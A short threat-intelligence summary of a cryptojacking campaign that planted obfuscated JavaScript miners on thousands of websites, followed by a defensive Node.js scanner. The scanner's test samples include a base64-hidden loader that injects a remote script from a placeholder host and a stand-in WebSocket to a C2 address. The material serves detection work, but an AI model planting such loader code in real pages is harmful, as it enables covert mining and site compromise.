Cybersecurity experts have uncovered a sophisticated campaign that has infected over 3,500 websites with stealthy JavaScript miners, signaling a resurgence of crypto-jacking tactics from 2017. This new approach uses advanced obfuscation and low-resource execution to evade detection while continuously mining cryptocurrency. #Coinhive #Magecart
Key points
- The campaign involves compromised websites embedding malicious JavaScript to enable covert cryptocurrency mining.
- Attackers utilize obfuscated code and Web Workers to run mining operations with minimal impact on device performance.
- The infection chain includes injection of base64-encoded scripts that load additional malicious payloads from suspicious domains.
- Methods such as WebSocket communication with C2 servers enable persistent and stealthy mining activities.
- The campaign’s infrastructure reuse hints at broader threat actor links to prior Magecart operations and other cyber threats.
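
For defenders triaging a site, the chain in the key points (a base64-encoded inline script that pulls a further payload, which then uses Web Workers and a WebSocket channel) can be checked with a small heuristic scanner. This is an added example, not code from the campaign or the original report; the sample page, the `example.invalid` hosts and all function names are constructed for illustration.

```javascript
// Added example: heuristic triage for the injection chain listed above.
// All sample input is constructed; example.invalid is a placeholder host.
const B64_LITERAL = /["'`]([A-Za-z0-9+/]{16,}={0,2})["'`]/g;

// Decode base64-looking string literals and keep those that hide a URL.
function hiddenUrls(src) {
  const urls = [];
  for (const m of src.matchAll(B64_LITERAL)) {
    const text = Buffer.from(m[1], "base64").toString("latin1");
    const url = text.match(/(?:https?|wss?):\/\/[\x21-\x7e]+/);
    if (url) urls.push(url[0]);
  }
  return urls;
}

// Tag one script body with the behaviours named in the key points.
function scanScript(src) {
  const tags = [];
  const urls = hiddenUrls(src);
  if (urls.length) tags.push("base64-url");
  if (/\bnew\s+Worker\s*\(/.test(src)) tags.push("web-worker");
  if (/\bnew\s+WebSocket\s*\(|\bwss?:\/\//.test(src)) tags.push("websocket");
  return { tags, urls };
}

// Scan every inline <script> in a page; external script sources are listed for review.
function scanHtml(html) {
  const findings = [];
  const external = [];
  for (const m of html.matchAll(/<script\b([^>]*)>([\s\S]*?)<\/script>/gi)) {
    const srcAttr = m[1].match(/\bsrc\s*=\s*["']?([^"'\s>]+)/i);
    if (srcAttr) external.push(srcAttr[1]);
    const result = scanScript(m[2]);
    if (result.tags.length) findings.push(result);
  }
  return { findings, external };
}

// Constructed sample: one ordinary script, one base64-hidden loader, one benign inline script.
const encoded = Buffer.from("https://cdn.example.invalid/a.js").toString("base64");
const SAMPLE_PAGE = `<html><head>
<script src="/static/app.js"></script>
<script>var s=document.createElement("script");s.src=atob("${encoded}");document.head.appendChild(s);</script>
<script>console.log("analytics ready");</script>
</head></html>`;
// Constructed second-stage script showing the Worker and WebSocket indicators.
const SAMPLE_STAGE2 = `const w = new Worker("w.js"); const c = new WebSocket("wss://c2.example.invalid/ws");`;

console.log(JSON.stringify(scanHtml(SAMPLE_PAGE), null, 2));
console.log(scanScript(SAMPLE_STAGE2).tags);
```

Hits are leads for manual review rather than verdicts, since Web Workers and WebSockets are also common in legitimate code.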
Read More: https://gbhackers.com/new-surge-of-crypto-jacking/